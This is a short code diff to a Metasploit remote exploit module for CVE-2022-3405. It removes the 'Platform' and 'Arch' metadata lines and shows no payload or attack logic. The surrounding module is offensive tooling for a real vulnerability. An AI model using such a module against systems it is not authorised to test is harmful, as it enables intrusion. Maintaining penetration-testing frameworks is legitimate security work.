@@ -54,9 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://attackerkb.com/topics/WVI3r5eNIc/cve-2022-3405']
         ],
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux', 'windows'],
         'Privileged' => true,
-        'Arch' => [ARCH_CMD],
         'Targets' => [
           [
             'Unix/Linux Command',
